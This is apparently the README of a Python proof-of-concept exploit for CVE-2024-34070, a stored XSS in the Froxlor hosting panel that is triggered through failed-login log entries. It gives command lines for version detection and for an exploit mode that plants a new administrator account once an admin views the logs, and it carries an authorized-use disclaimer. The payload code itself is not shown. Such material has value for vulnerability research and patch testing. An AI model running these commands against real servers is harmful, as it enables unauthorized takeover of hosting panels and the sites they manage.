## https://sploitus.com/exploit?id=B2320075-9374-5FD1-9A5C-1FB8B4C7FC00
# CVE-2024-34070 Froxlor PoC
Python proof of concept for CVE-2024-34070, a stored XSS issue in Froxlor before 2.1.9 through failed login attempts written to the system log.
## WARNING
This project is for authorized security testing, CTF labs, and educational use only. Do not run this against systems you do not own or do not have explicit permission to test. The exploit mode can create an administrator account on the target Froxlor instance.
## Features
- Detect a Froxlor instance.
- Extract the Froxlor version from an authenticated admin session, when valid credentials are provided.
- Report whether the detected version is vulnerable (`< 2.1.9`).
- Inject the stored XSS payload that creates a new administrator.
- Verify whether the created administrator account can log in.
## Usage
Unauthenticated detection:
```bash
python3 main.py --url http://240.0.0.1:8080 --check
```
Authenticated detection, used to retrieve the exact Froxlor version:
```bash
python3 main.py --url http://240.0.0.1:8080 --check --login admin --password 'password'
```
Exploit mode, creating a new administrator:
```bash
python3 main.py --url http://240.0.0.1:8080 --exploit \
--new-admin abcd \
--new-password 'Abcd@@1234' \
--new-email yldrmtest@gmail.com
```
If an administrator or automation bot reads the Froxlor system logs, the verification step should eventually redirect to `admin_index.php`.
## Notes
- The script uses only the Python standard library.
- Without an authenticated admin session, the exact version may be unknown. In that case, `--check` can confirm Froxlor but cannot strictly determine vulnerability.
- The payload uses a relative URL (`/admin_admins.php`) so it works against the target instance instead of a hard-coded domain.